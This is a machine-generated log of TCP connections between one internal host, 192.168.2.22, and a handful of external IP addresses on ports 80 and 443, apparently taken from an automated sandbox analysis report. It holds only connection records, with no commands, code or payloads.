Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 54.150.207.131:443
Source: global traffic	TCP traffic: 54.150.207.131:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 54.150.207.131:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 54.150.207.131:443
Source: global traffic	TCP traffic: 54.150.207.131:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 54.150.207.131:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 54.150.207.131:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 54.150.207.131:443
Source: global traffic	TCP traffic: 54.150.207.131:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 54.150.207.131:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 54.150.207.131:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 54.150.207.131:443
Source: global traffic	TCP traffic: 54.150.207.131:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 54.150.207.131:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 54.150.207.131:443
Source: global traffic	TCP traffic: 54.150.207.131:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 54.150.207.131:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 54.150.207.131:443
Source: global traffic	TCP traffic: 54.150.207.131:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 45.63.94.214:443
Source: global traffic	TCP traffic: 45.63.94.214:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 45.63.94.214:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 45.63.94.214:443
Source: global traffic	TCP traffic: 45.63.94.214:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 45.63.94.214:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 45.63.94.214:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 45.63.94.214:443
Source: global traffic	TCP traffic: 45.63.94.214:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 45.63.94.214:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 45.63.94.214:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 45.63.94.214:443
Source: global traffic	TCP traffic: 45.63.94.214:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 45.63.94.214:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 45.63.94.214:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 45.63.94.214:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 45.63.94.214:443
Source: global traffic	TCP traffic: 45.63.94.214:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 45.63.94.214:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 45.63.94.214:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 45.63.94.214:443
Source: global traffic	TCP traffic: 45.63.94.214:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 45.63.94.214:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 45.63.94.214:443
Source: global traffic	TCP traffic: 45.63.94.214:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 45.63.94.214:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 45.63.94.214:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 45.63.94.214:443
Source: global traffic	TCP traffic: 45.63.94.214:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 45.63.94.214:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 45.63.94.214:443
Source: global traffic	TCP traffic: 45.63.94.214:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 45.63.94.214:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 45.63.94.214:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 45.63.94.214:443
Source: global traffic	TCP traffic: 45.63.94.214:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 45.63.94.214:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 45.63.94.214:443
Source: global traffic	TCP traffic: 45.63.94.214:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 45.63.94.214:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 45.63.94.214:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 45.63.94.214:443
Source: global traffic	TCP traffic: 45.63.94.214:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 45.63.94.214:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 45.63.94.214:443
Source: global traffic	TCP traffic: 45.63.94.214:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 45.63.94.214:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 45.63.94.214:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 45.63.94.214:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 45.63.94.214:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 45.63.94.214:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 45.63.94.214:443
Source: global traffic	TCP traffic: 45.63.94.214:443 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 54.150.207.131:443
Source: global traffic	TCP traffic: 54.150.207.131:443 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 54.150.207.131:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 54.150.207.131:443
Source: global traffic	TCP traffic: 54.150.207.131:443 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 54.150.207.131:443 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 54.150.207.131:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 54.150.207.131:443
Source: global traffic	TCP traffic: 54.150.207.131:443 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 54.150.207.131:443
Source: global traffic	TCP traffic: 54.150.207.131:443 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 151.101.1.137:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 151.101.1.137:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 54.150.207.131:443 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 54.150.207.131:443
Source: global traffic	TCP traffic: 54.150.207.131:443 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 54.150.207.131:443 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 54.150.207.131:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 54.150.207.131:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 54.150.207.131:443
Source: global traffic	TCP traffic: 54.150.207.131:443 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 151.101.1.137:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 151.101.1.137:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 151.101.1.137:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 23.95.235.29:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 23.95.235.29:80
Source: global traffic	TCP traffic: 151.101.1.137:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 151.101.1.137:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 151.101.1.137:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 151.101.1.137:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 151.101.1.137:443
Source: global traffic	TCP traffic: 151.101.1.137:443 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 151.101.1.137:443 -> 192.168.2.22:49168
